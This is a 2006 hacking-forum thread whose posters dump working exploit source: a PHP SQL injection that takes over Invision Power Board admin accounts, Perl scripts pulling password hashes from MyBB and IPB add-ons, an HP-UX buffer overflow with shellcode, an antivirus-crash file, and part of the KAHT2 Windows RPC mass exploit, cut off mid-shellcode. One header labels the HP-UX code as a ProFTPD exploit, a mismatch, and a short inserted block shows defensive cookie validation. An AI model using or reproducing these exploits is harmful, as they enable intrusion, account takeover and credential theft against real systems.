Exploits, post exploits here
de1ay
pro!
[SoftoRooMTeaM]
Group: Our People  Posts: 4.437  Registered: 14.10.2005  From: EU  User #: 1.010
Respects: 613
This thread was created for dumping the source code of fresh exploits! No discussion is held in this thread! Only a description of the exploit, a link to the source, or the source itself.

Cross-site scripting and SQL injection in Invision Power Board (2.0.0 - 2.1.4)

Description: The vulnerability allows a remote user to carry out an XSS attack and execute arbitrary SQL commands in the application's database.

1. The vulnerability exists because of insufficient processing of input data in cookies. A remote user can execute arbitrary SQL commands in the application database by means of a specially crafted URL.

2. The vulnerability exists because of insufficient processing of input data in certain parameters. A remote user can execute arbitrary script code in the victim's browser, in the security context of the vulnerable site, by means of a specially crafted request.

Exploit:

/*
   === - security team - ===
   Invision Power Board < 2.1.4 Password change SQL-Injection Exploit
   by roOstY
   Ru24 Security Team <= www.Ru24-Team.net =>
   ----
   For example you can reset password for admin (link to "forget Password"
   add ask to change this password. At the end of exploit you get link to
   change admin password)
   Working in all Invision Power Forum forum before 2.1.4 but you need good
   mysql version
   Greetz to Nitrex and Dukenn
   Regards to: Dr_UFO_51,k0pa,NSD,Naikon and other...
   Before runing,you must setup some settings
   WARNING: You must setup the CURL-module for PHP!
   ----
*/
/* In any case at first you need to change password to $target if you can't understand that */
// error_reporting(E_ALL);

############ Settings ###########################################################
$proxy="24.48.*.*:**";            ## - your socks 4/5-proxy
$host=" http://forum.***.lt";     ## - target forum
$login="****";                    ## - login to forum
$password="****";                 ## - pass to forum
$cook_name="ibf_topicsread";      ## - target cookie name (default: ibf_topicsread)
$topic=22;                        ## - any real topyc
$target=1;                        ## - id target to admin or other user that you want to reset password
#####
# At first you need to reset pasword for target user.
# For example you can reset password for admin (link to "forget Password" add ask to change this password. At the end of you get link to change admin password)
####
$len=32;                          ## 5 for salt
## it's my
$ver=1;                           ## if not wor change to 2
$cookie_file_path = "/tmp/cookie"; ## for my opinuion, you can to set other
$agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)";
################################################################################
$cookie="";
echo "Login...";
$url=$host."/index.php?act=Login&CODE=01&CookieDate=1";
$reffer=$host."/index.php?act=Login&CODE=00";
$post['UserName']=urlencode($login);
$post['PassWord']=urlencode($password);
$result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,$post,""); ###### Login to the forum
$cook=getcookiee($result);
foreach ($cook as $k=>$v) { $cookie[$k]=$v; }
if (!strstr($result,$login)) { echo "error. Invalid Login or Password then Login\n"; exit; }
else echo "done\n";
echo "Redirecting to main page...";
$url=$host.urldecode(ExtractString($result,$host,"\" "));
$result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,"",""); ###### Redirect to the main page
$cook=getcookiee($result);
foreach ($cook as $k=>$v) { $cookie[$k]=$v; }
if (!strstr($result,$login)) { echo "error. Invalid Login or Password then Redirect\n"; exit; }
else echo "done\n";
$reffer=$url;
echo "Going to Control Panel...";
$url=$host."/index.php?act=UserCP&CODE=00";
$reffer="";$agent="";
$result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,"",""); ###### Go te the control panel
$cook=getcookiee($result);
foreach ($cook as $k=>$v) { $cookie[$k]=$v; }
if (!strstr($result,$login)) { echo "error. Invalid Login or Password then going to Control\n"; exit; }
echo "done\n";
echo "Get table prefix...";
$arr[$topic]=1111111111;
$arr['-1) andd']=$topic;
$cookie_base="";
foreach ( $cookie as $k=>$v ) { $cookie_base.= $k."=".$v."; "; }
$cookie_add=$cookie_base.$cook_name."=".urlencode(serialize($arr));
unset($arr);
$result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,"",$cookie_add);
if (!(strstr($result,"Error"))) { echo "error. Target seems not vuln"; exit; }
$pref=ExtractString($result,"SELECT * FROM ","topics");
echo "done prefix: ".$pref."\n";
$al="";
echo "Checking Mysql version....";
$targval=explode(".",$target);
$arr[$topic]=1111111111;
$arr['-1) and @@version<4/*']=$topic;
$cookie_add=$cookie_base."; ".$cook_name."=".urlencode(serialize($arr));
unset($arr);
$result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,"",$cookie_add);
if (!strstr($result,"showtopic=".$target)) echo "done Mysql ver > 4 - GOOD!\n";
else { echo "done Mysql ver < 4. We can use only dos\n"; exit; }
echo "Exploiting....";
$sent='%61%3A%32%3A%7B%73%3A';
if ($ver==1)
    $exp="-999) UNION SELECT 0,vid,null,'open',0,1,1132440935,1,11132440935,0,null,null,0,0,2,2,1,0,0,0,0,0,1,0,0,0,0,0,0 from ".$pref."validating where member_id=".$target." LIMIT 1/*";
else
    $exp="-999) UNION SELECT 0,vid,null,'open',0,1,1132440935,1,11132440935,0,null,null,0,0,2,2,1,0,0,null,null,0,0,1,0 from ".$pref."validating where member_id=".$target." LIMIT 1/*";
$arr[$topic]=1111111111;
$arr[$exp]=$topic;
$cookie_add=$cookie_base."; ".$cook_name."=".urlencode(serialize($arr));
unset($arr);
$result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,"",$cookie_add);
if (!strstr($result,"different number of columns")) {
    echo "done\n";
    $vid=substr($result,strpos($result,"")-32,32);
    echo "Done\nGoto url: [".$host."/index.php?act=Reg&CODE=lostpassform&uid=".$target."&aid=".$vid."] and change user password!\n";
} else { echo "bad Can't find number of colums\n"; }
echo "Checking Mysql version 2....";
$targval=explode(".",$target);
$arr[$topic]=1111111111;
$arr['-1) and @@version<4.1/*']=$topic;
$cookie_add=$cookie_base."; ".$cook_name."=".urlencode(serialize($arr));
unset($arr);
$result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,"",$cookie_add);
//echo $result;exit;
if (!strstr($result,"showtopic=".$target)) echo "done Mysql ver > 4.1 - GOOD!\n";
else { echo "done Mysql ver < 4.1. We can't use SUBSELECT\n"; exit; }
echo "Bruteforcing....\n";
$val="";
for ($j=16;$j<=$len;$j++) {
    $a2=128; $a1=32;
    while (($a2-$a1)>=5) {
        $s=round(($a1+$a2)/2,0);
        echo $s;
        $arr[$topic]=1111111111;
        $arr['-1) and '.$s.'>(select ord(substring(vid,'.$j.',1)) from '.$pref.'validating where member_id='.$target.' LIMIT 1)/*']=$topic;
        $cookie_add=$cookie_base."; ".$cook_name."=".urlencode(serialize($arr));
        unset($arr);
        $result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,"",$cookie_add);
        if ((strstr($result,"Error"))) { echo "Error querry!\n"; exit; }
        if (strstr($result,"showtopic")) $a2=$s; else $a1=$s;
    }
    for ($i=$a1;$i<=$a2;$i++) {
        echo $i;
        $arr[$topic]=1111111111;
        $arr['-1) and '.$i.'=(select ord(substring(vid,'.$j.',1)) from '.$pref.'validating where member_id='.$target.' LIMIT 1)/*']=$topic;
        $cookie_add=$cookie_base."; ".$cook_name."=".urlencode(serialize($arr));
        $result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,"",$cookie_add);
        // echo urlencode(serialize($arr)).$result;exit;
        if (strstr($result,"showtopic")) { $val .= chr($i); echo " - Get_symb:[".$j."] ".chr($i)."\n"; break; }
    }
}
echo "Done\nGoto url: [".$host."/index.php?act=Reg&CODE=lostpassform&uid=".$target."&aid=".strtolower($val)."] and change user password!\n";

function getcookiee($result) {
    $res = explode("\n",$result);
    foreach ($res as $k=>$v ) {
        if (ereg("Set-Cookie",$v)) {
            $c_a = explode(";",trim(str_replace("Set-Cookie:","",$v)));
            foreach ($c_a as $k=>$v ) {
                if (!(ereg("expires",$v))) {
                    $arr=explode("=",trim($v));
                    $cook[trim($arr[0])]=trim($arr[1]);
                }
            }
        }
    }
    return $cook;
}

function querry($url,$agent,$proxy,$reffer,$cookie_file_path,$post,$cookie) {
    $ch = curl_init ();
    curl_setopt ($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_USERAGENT, $agent);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    if ($post!="") { curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); }
    curl_setopt ($ch, CURLOPT_TIMEOUT, 120);
    curl_setopt ($ch, CURLOPT_PROXY, $proxy);
    curl_setopt ($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
    curl_setopt ($ch, CURLOPT_RETURNTRANSFER, TRUE);
    curl_setopt ($ch, CURLOPT_FAILONERROR, false);
    curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_REFERER, $reffer);
    if ($cookie!="") curl_setopt($ch, CURLOPT_COOKIE, $cookie);
    // else {
    curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file_path);
    curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_file_path);
    // }
    curl_setopt($ch, CURLOPT_HEADER, 1);
    $result = curl_exec($ch);
    $error=curl_errno($ch);
    curl_close ($ch);
    if ($error) $result="Fucking Error: ".$error."\r\n";
    if ($error==7) $result=$result." Failed to connect() to host or proxy.\r\n";
    if ($error==28) $result=$result." Operation timeout. The specified time-out period was reached according to the conditions.\r\n";
    if ($error==22) $result=$result." Sorry, Unable to process request at this time, Please try again later.\r\n";
    return $result;
}

function ExtractString($str, $start, $end) {
    $str_low = ($str);
    if (strpos($str_low, $start) !== false && strpos($str_low, $end, strpos($str_low, $start)) !== false) {
        $pos1 = strpos($str_low, $start) + strlen($start);
        $pos2 = strpos($str_low, $end,strpos($str_low, $start)) - $pos1;
        return substr($str, $pos1, $pos2);
    }
}
?>
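A defensive counterpart, added here and not part of the exploit or of IPB's own code: the payload above travels in the array keys of the serialized ibf_topicsread cookie, so the application-side fix is to treat that cookie as untrusted input and let only plain integers reach the query. The function names and the assumed cookie layout (topic id => last-read timestamp) are taken from how the exploit builds the cookie, not from IPB sources.

```php
<?php
// Added defensive example, not IPB code. The exploit above smuggles SQL into the
// *keys* of the serialized ibf_topicsread cookie ("-1) and @@version<4/*"),
// relying on the application to splice those keys into a WHERE ... IN (...) list.
// Assumed layout (inferred from the exploit): array(topic_id => last_read_timestamp).

/**
 * Parse a "topics read" cookie into [topic_id => timestamp] with both sides
 * guaranteed to be non-negative integers. Any anomaly yields an empty array,
 * which the caller treats as "nothing read" rather than as an error to report.
 */
function parse_topics_read_cookie(string $raw, int $max_entries = 200): array
{
    // Bound the work before touching the payload.
    if ($raw === '' || strlen($raw) > 8192) {
        return [];
    }
    // allowed_classes => false (PHP >= 7.0) blocks object instantiation via the cookie.
    $data = @unserialize($raw, ['allowed_classes' => false]);
    if (!is_array($data) || count($data) > $max_entries) {
        return [];
    }
    $clean = [];
    foreach ($data as $tid => $ts) {
        // PHP converts canonical numeric-string keys to int on its own; a key that is
        // still a string (such as "-1) and ...") can only be an injection attempt.
        if (!is_int($tid) || $tid < 0 || !is_int($ts) || $ts < 0) {
            return [];
        }
        $clean[$tid] = $ts;
    }
    return $clean;
}

/**
 * Build the IN (...) operand from an already validated array. intval() on each
 * key is redundant after validation but keeps the query builder safe on its own.
 */
function topic_id_list(array $topics): string
{
    if ($topics === []) {
        return '0';   // keeps "IN (0)" syntactically valid and matches no topic
    }
    return implode(',', array_map('intval', array_keys($topics)));
}

// Constructed samples: a legitimate cookie and one shaped like the exploit's payload.
$legit   = serialize([22 => 1111111111, 57 => 1141855200]);
$hostile = serialize([22 => 1111111111, '-1) and @@version<4/*' => 22]);

echo "legit   -> IN (" . topic_id_list(parse_topics_read_cookie($legit)) . ")\n";
echo "hostile -> IN (" . topic_id_list(parse_topics_read_cookie($hostile)) . ")\n";
```

Better still is not to unserialize client-controlled data at all: a flat "tid:ts,tid:ts" format checked with a strict regex removes the deserialization surface entirely.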
8.03.2006 - 23:52
PRYANIK
Made In Tula
[SoftoRooMTeaM]
Group: Administrators  Posts: 31.141  Registered: 22.02.2004  User #: 7
Respects: 6388
D2-Shoutbox 4.2 (IPB Mod) SQL injection

#!/usr/bin/perl
#"Powered By D2-Shoutbox 4.2"
#########################################################
use IO::Socket;
$host = $ARGV[0];
$user = $ARGV[2];
$uid = $ARGV[3];
$pid = $ARGV[4];
$type = $ARGV[5];

sub type() {
    if($type==1){$row="password";}
    if($type==2){$row="member_login_key";}
    else{print "Just 1 Or 2\n";exit();}
    $sql="index.php?act=Shoutbox&view=saved&load=-1%20UNION%20SELECT%20null,null,null,null,".$row.",null,null,null%20FROM%20ibf_members%20where%20id=".$user."/*";
    $path = $ARGV[1].$sql;
}

sub header() {
    print q{
#######################################################################
###           D2-Shoutbox 4.2 SQL injection Exploit                 ###
###           Tested On D2-Shoutbox 4.2 And IPB 2.4                 ###
###           Created By SkOd, Sed Security Team                    ###
#######################################################################
sedSB.pl [HOST] [DIR] [victim] [my id] [my md5 hash] [1-(1.*)/2-(2.*)]
sedSB.pl www.host.com /forum/ 2 4500 f3b8a336b250ee595dc6ef6bac38b647 2
#######################################################################
    }
}

sub sedsock() {
    $sedsock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => "80") || die "[-]Connect Failed\r\n";
    print $sedsock "GET $path HTTP/1.1\n";
    print $sedsock "Host: $host\n";
    print $sedsock "Accept: */*\n";
    print $sedsock "Cookie: member_id=$uid; pass_hash=$pid\n";
    print $sedsock "Connection: close\n\n";
    while($res = <$sedsock>){
        $res =~ m/shout_s'>(.*?)<\/textarea>/ && print "[+]User: $user\n[+]Md5 Hash: $1\n";
    }
}

if(@ARGV < 6){ header(); }else{ type(); sedsock(); }

Invision Power Board Dragoran's Portal SQL injection

#!/usr/bin/perl
############################################
#"Portal 1.3 by Dragoran"
#########################################################
use IO::Socket;
if (@ARGV < 3){
    print q{
############################################################
#    IPB Portal 1.3 SQL injection Get Hash Exploit         #
#    Tested on Invision Power Board 1.3.0                  #
#    created By SkOd. SED Security Team                    #
############################################################
ipbpro.pl [HOST] [PATH] [Target id]
ipbpro.pl www.host.com /forum/ 2
############################################################
print "[+]Connecting...\n";
    };
    exit;
}
$serv = $ARGV[0];
$serv =~ s/(http:\/\/)//eg;
$dir = $ARGV[1];
$id = $ARGV[2];
$inj = $dir.'index.php?act=portal&site=-999%20UNION%20SELECT%20substring(password,1,10),substring(password,11,20),substring(password,21,30)%20FROM%20ibf_members%20Where%20id='.$id.'/*';
$inj2 = $dir.'index.php?act=portal&site=-999%20UNION%20SELECT%20substring(password,31,32),null,null%20FROM%20ibf_members%20Where%20id='.$id.'/*';
$inje=$inj;
print "[+]User ID: $id\n";
print "[+]MD5 Hash: ";
for ($i=1; $i<3; $i++) {
    if($i==2){ $inje=$inj2; }
    $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-]Connect Failed\r\n";
    print $socket "GET $inje HTTP/1.1\n";
    print $socket "Host: $serv\n";
    print $socket "Accept: */*\n";
    print $socket "Connection: close\n\n";
    while ($answer = <$socket>) {
        $answer =~ s/width="(.*%)"//eg;
        $answer =~ m/width="(.*?)"/ && print $1;
    }
}
8.03.2006 - 23:53
de1ay
Invision Power Board < 2.1.4 Password change SQL-Injection Exploit

Exploit here:
9.03.2006 - 8:33
de1ay
QUOTE: Guys, I think it would be better to attach the exploits as attachments!

I think so too.

phpRPC <= 0.7 commands execute exploit

Affected products: MYPHPNUKE:myPHPNuke 1.8, SQUIRRELMAIL:squirrelmail 1.4, PUNBB:PunBB 1.2, PWSPHP:PwsPHP 1.2, MYBB:MyBB 1.0, EKINBOARD:EKINboard 1.0, FSCRIPTS:Fantastic News 2.1, WORDPRESS:Wordpress 2.0, TECASCRIPTS:Quirex 2.0, PERLBLOG:PerlBlog 1.08, PERLBLOG:PerlBlog 1.09, ARCHANGELMGT:Archangel Weblog 0.90, PHPRPC:phpRPC 0.7, TL4S:D3Jeeb Pro 3, CGICALENDAR:CGI Calendar 2.7, REYERO:DirectContact 3.0, LANSUITE:LanParty Intranet System 2.1, IGENUS:iGENUS Webmail 2.02, 4HOMEPAGES:4images 1.7, ISSUEDEALER:Issue Dealer 0.9, JFACETS:JFacets 0.1, PARODIA:Parodia 6.2, NATHANLANDRY:n8cms 1.1, NATHANLANDRY:n8cms 1.2, FARSINEWS:FarsiNews 2.5, EJ3:EJ3 TOPo 2.2, SENDCARD:sendcard 3.3, STOREBOT:StoreBot 2002, STOREBOT:StoreBot 2005

Exploit:
9.03.2006 - 9:02
de1ay
Vulnerability in ProFTPD (exploit code)

ProFTPD is an FTP daemon for UNIX and UNIX-like operating systems. Although this FTP daemon is positioned as a secure FTP server, a vulnerability in the daemon's protection makes a DoS attack possible by means of a large number of commands of "incorrect" size. The exploit code demonstrates this ProFTPD vulnerability.

Vulnerable systems: ProFTPD version 1.2.0rc1, ProFTPD version 1.2.0rc2

Exploit:

/* Copyright © 2001 Zorgon
 * All Rights Reserved
 * The copyright notice above does not evidence any
 * actual or intended publication of such source code.
 *
 * HP-UX /bin/cu exploit.
 * Tested on HP-UX 11.00
 * [email protected] ( http://www.nightbird.free.fr)
 *
 */
#include
#include
#include
#include
#define LEN 9778
#define HPPA_NOP 0x0b390280
#define RET 0x7f7eb010
#define OFFSET 1200 /* it works for me */
u_char hppa_shellcode[] = /* K2 shellcode */
"\xe8\x3f\x1f\xfd\x08\x21\x02\x80\x34\x02\x01\x02\x08\x41\x04\x02\x60\x40"
"\x01\x62\xb4\x5a\x01\x54\x0b\x39\x02\x99\x0b\x18\x02\x98\x34\x16\x04\xbe"
"\x20\x20\x08\x01\xe4\x20\xe0\x08\x96\xd6\x05\x34\xde\xad\xca\xfe/bin/sh\xff";
int main(int argc , char **argv){
    char buffer[LEN+8];
    int i;
    long retaddr = RET;
    int offset = OFFSET;
    if(argc>1) offset = atoi(argv[1]);
    for (i=0;i *(long *)&buffer[i] = retaddr + offset;
    for (i=0;i<(LEN-strlen(hppa_shellcode)-50);i++) *(buffer+i) = HPPA_NOP;
    memcpy(buffer+i,hppa_shellcode,strlen(hppa_shellcode));
    fprintf(stderr, "HP-UX 11.00 /bin/cu exploit\n");
    fprintf(stderr, "Copyright © 2001 Zorgon\n");
    fprintf(stderr, "[return address = %x] [offset = %d] [buffer size = %d]\n", retaddr + offset, offset, strlen(buffer));
    execl("/bin/cu","cu","-l",buffer,0);
}
9.03.2006 - 22:23
de1ay
Norton AntiVirus Crash by NAV.kill File

The antivirus fails when scanning certain PE files.

Exploit:

#include
#include
#include
unsigned char NAVkill[]=
    /* raw byte dump of the crashing file omitted */ ;
int main(int argc, char* argv[]) {
    FILE *NKfile;
    char filenameX[200];
    printf("Norton AntiVirus Crash by NAV.kill File & Hide Virus \n");
    printf(" Coded by: JAAScois - Web site : www.jaascois.com\n");
    ZeroMemory(filenameX,200);
    CreateDirectory("c:\\NAVdir",NULL);
    strcpy(filenameX,"c:\\NAVdir\\NAV.kill");
    NKfile=fopen(filenameX,"w+b");
    if(NKfile==NULL){ printf("-Error: fopen \n"); return 0; }
    fwrite(NAVkill,2669,1,NKfile);
    fclose (NKfile);
    printf("- Created file: NAV.kill ...OK\n- Now scan this folder [C:\\NAVdir\\] by Norton AntiVirus to Crash !\n\n");
    return 0;
}
10.03.2006 - 8:38
de1ay
MyBB Forum SQL Injection Exploit

Affected products: PHPNUKE:phpNuke 7.8, MANTIS:Mantis 1.0, WORDPRESS:Wordpress 2.0, DELTASCRIPTS:PHP Classifieds 6.20, DOTPROJECT:dotproject 2.0, MYBB:MyBB 1.03

Exploit:

#!/bin/env perl
#//------#
#// MyBB Forum SQL Injection Exploit .. By HACKERS PAL #
#// Greets For Devil-00 - Abducter - Almaster - GaCkeR #
#// Special Greets For SG (SecurityGurus) Team And Members #
#// http://WwW.SoQoR.NeT #
#//------#
use LWP::Simple;
print "\n#####################################################";
print "\n# MyBB Forum Exploit By : HACKERS PAL #";
print "\n# Http://WwW.SoQoR.NeT #";
if(!$ARGV[0] or !$ARGV[1]) {
    print "\n# -- Usage: #";
    print "\n# -- perl $0 [Full-Path] [User ID] #";
    print "\n# -- Example: #";
    print "\n# -- perl $0 http://mods.mybboard.com/forum/ 1 #";
    print "\n# Greets To Devil-00 - Abducter - GaCkeR #";
    print "\n#####################################################";
    exit(0);
} else {
    print "\n# Greets To Devil-00 - Abducter - GaCkeR #";
    print "\n#####################################################";
    $web=$ARGV[0];
    $id=$ARGV[1];
    $url = "showteam.php?GLOBALS[]=1&comma=/*";
    $site="$web/$url";
    $page = get($site) || die "[-] Unable to retrieve: $!";
    $page =~ m/FROM (.*)users u WHERE/;
    $prefix=$1;
    if(!$1) { $prefix="mybb_"; }
    $url = "showteam.php?GLOBALS[]=1&comma=- 2)%20union%20select%20uid,username,null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,
null,null,null,1,4%20from%20".$prefix."users%20where%20uid=$id/*";
    $site="$web/$url";
    $page = get($site) || die "[-] Unable to retrieve: $!";
    print "\n[+] Connected to: $ARGV[0]\n";
    print "[+] User ID is : $id ";
    print "\n[+] Table Prefix is : $prefix";
    $page =~ m/ (.*)<\/i><\/b>/ && print "\n[+] User Name : $1";
    print "\n[-] Unable to retrieve User Name\n" if(!$1);
    $url = "showteam.php?GLOBALS[]=1&comma=- 2)%20union%20select%20uid,password,null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,
null,null,null,1,4%20from%20".$prefix."users%20where%20uid=$id/*";
    $site="$web/$url";
    $page = get($site) || die "[-] Unable to retrieve: $!";
    $page =~ m/(.*)<\/i><\/b>/ && print "\n[+] Md5 Hash of Password : $1\n";
    die("\n[-] Unable to retrieve The Hash of password\n") if(!$1);
    print"\n[!] Watch out ... The Cookie Value is comming\n";
    $url = "showteam.php?GLOBALS[]=1&comma=- 2)%20union%20select%20uid,loginkey,null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,
null,null,null,1,4%20from%20".$prefix."users%20where%20uid=$id/*";
    $site="$web/$url";
    $page = get($site) || die "[-] Unable to retrieve: $!";
    $page =~ m/(.*)<\/i><\/b>/ && print "[+] Cookie [mybbuser] Value:-\n[*] $id"."_"."$1\n";
    print "[-] Unable to retrieve Login Key\n" if(!$1);
}
# WwW.SoQoR.NeT
11.03.2006 - 22:48
ZaHack
Big Brother
Group: Banned  Posts: 1.252  Registered: 24.01.2006  From: Where The Eagles Fly  User #: 333
Respects: 117
Source of the well-known KAHT2 exploit!! For getting admin rights on Win NT-family systems:
#include
#include
#include
#include
#include
#ifdef WIN32
#include
#include
#include
#include
#include
#pragma comment (lib,"ws2_32.lib")
#else
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#endif
#define MAX_THREADS 512
#define NTHREADS 50
#define PORT 135
#define CONNECT 6 //Connect Timeout
#define RECV 5 //recv Timeout
#define ATTACKTIMEOUT 5 //
#define RPC_FINGERPRINT_TIMEOUT 6 //rpc fingerprint
#define INITRPORT (rand()/2)+32767
//#define INITRPORT 53 //PORT TO SPAWN A SHELL
int RPORT,salir=0,threads=0,rpcopen=0;
//int AUTOHACKING=0;
int ip1[4],ip2[4];
FILE *results; //results.txt: IPs with port 135 open
#ifndef WIN32
#define CRITICAL_SECTION pthread_t
#endif
CRITICAL_SECTION cs,css,cslog,csshell; //Givemeip CS, number of threads, ipstologfile,shell()
//Ultra Fast port Scanner
char *givemeip(char *ip);
void checkea(void *threadn);
//Macro Functions..
void show_macros(int sock2);
void execute_macro(char opt,int sock2);
void macro(char opt, int sock2);
//Exploit Code...
void attack(char *linea,int peta);
int shell (int sock2);
void readconsole(void *sock2);
//me
void banner(void);
// remote Install
int InstallRemoteServiceNbt (char *ip);
int InstallRemoteServiceFtp (char *ip);
unsigned char bindstr[]={ 0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
unsigned char winshellcode[]= "\x05\x00\x00\x03\x10\x00\x00\x00\xa8\x06\x00\x00\xe5\x00\x00\x00" "\x90\x06\x00\x00\x01\x00\x04\x00\x05\x00\x06\x00\x01\x00\x00\x00" "\x00\x00\x00\x00\x32\x24\x58\xfd\xcc\x45\x64\x49\xb0\x70\xdd\xae" "\x74\x2c\x96\xd2\x60\x5e\x0d\x00\x01\x00\x00\x00\x00\x00\x00\x00" "\x70\x5e\x0d\x00\x02\x00\x00\x00\x7c\x5e\x0d\x00\x00\x00\x00\x00" "\x10\x00\x00\x00\x80\x96\xf1\xf1\x2a\x4d\xce\x11\xa6\x6a\x00\x20" "\xaf\x6e\x72\xf4\x0c\x00\x00\x00\x4d\x41\x52\x42\x01\x00\x00\x00" "\x00\x00\x00\x00\x0d\xf0\xad\xba\x00\x00\x00\x00\xa8\xf4\x0b\x00" "\x20\x06\x00\x00\x20\x06\x00\x00\x4d\x45\x4f\x57\x04\x00\x00\x00" "\xa2\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46" "\x38\x03\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46" "\x00\x00\x00\x00\xf0\x05\x00\x00\xe8\x05\x00\x00\x00\x00\x00\x00" "\x01\x10\x08\x00\xcc\xcc\xcc\xcc\xc8\x00\x00\x00\x4d\x45\x4f\x57" "\xe8\x05\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00" "\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\xc4\x28\xcd\x00\x64\x29\xcd\x00\x00\x00\x00\x00" "\x07\x00\x00\x00\xb9\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00" "\x00\x00\x00\x46\xab\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00" "\x00\x00\x00\x46\xa5\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00" "\x00\x00\x00\x46\xa6\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00" "\x00\x00\x00\x46\xa4\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00" "\x00\x00\x00\x46\xad\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00" "\x00\x00\x00\x46\xaa\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00" "\x00\x00\x00\x46\x07\x00\x00\x00\x60\x00\x00\x00\x58\x00\x00\x00" "\x90\x00\x00\x00\x40\x00\x00\x00\x20\x00\x00\x00\x38\x03\x00\x00" "\x30\x00\x00\x00\x01\x00\x00\x00\x01\x10\x08\x00\xcc\xcc\xcc\xcc" "\x50\x00\x00\x00\x4f\xb6\x88\x20\xff\xff\xff\xff\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x01\x10\x08\x00\xcc\xcc\xcc\xcc" "\x48\x00\x00\x00\x07\x00\x66\x00\x06\x09\x02\x00\x00\x00\x00\x00" "\xc0\x00\x00\x00\x00\x00\x00\x46\x10\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x78\x19\x0c\x00" "\x58\x00\x00\x00\x05\x00\x06\x00\x01\x00\x00\x00\x70\xd8\x98\x93" "\x98\x4f\xd2\x11\xa9\x3d\xbe\x57\xb2\x00\x00\x00\x32\x00\x31\x00" "\x01\x10\x08\x00\xcc\xcc\xcc\xcc\x80\x00\x00\x00\x0d\xf0\xad\xba" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x18\x43\x14\x00\x00\x00\x00\x00\x60\x00\x00\x00\x60\x00\x00\x00" "\x4d\x45\x4f\x57\x04\x00\x00\x00\xc0\x01\x00\x00\x00\x00\x00\x00" "\xc0\x00\x00\x00\x00\x00\x00\x46\x3b\x03\x00\x00\x00\x00\x00\x00" "\xc0\x00\x00\x00\x00\x00\x00\x46\x00\x00\x00\x00\x30\x00\x00\x00" "\x01\x00\x01\x00\x81\xc5\x17\x03\x80\x0e\xe9\x4a\x99\x99\xf1\x8a" "\x50\x6f\x7a\x85\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00" "\x01\x10\x08\x00\xcc\xcc\xcc\xcc\x30\x00\x00\x00\x78\x00\x6e\x00" "\x00\x00\x00\x00\xd8\xda\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x20\x2f\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00" 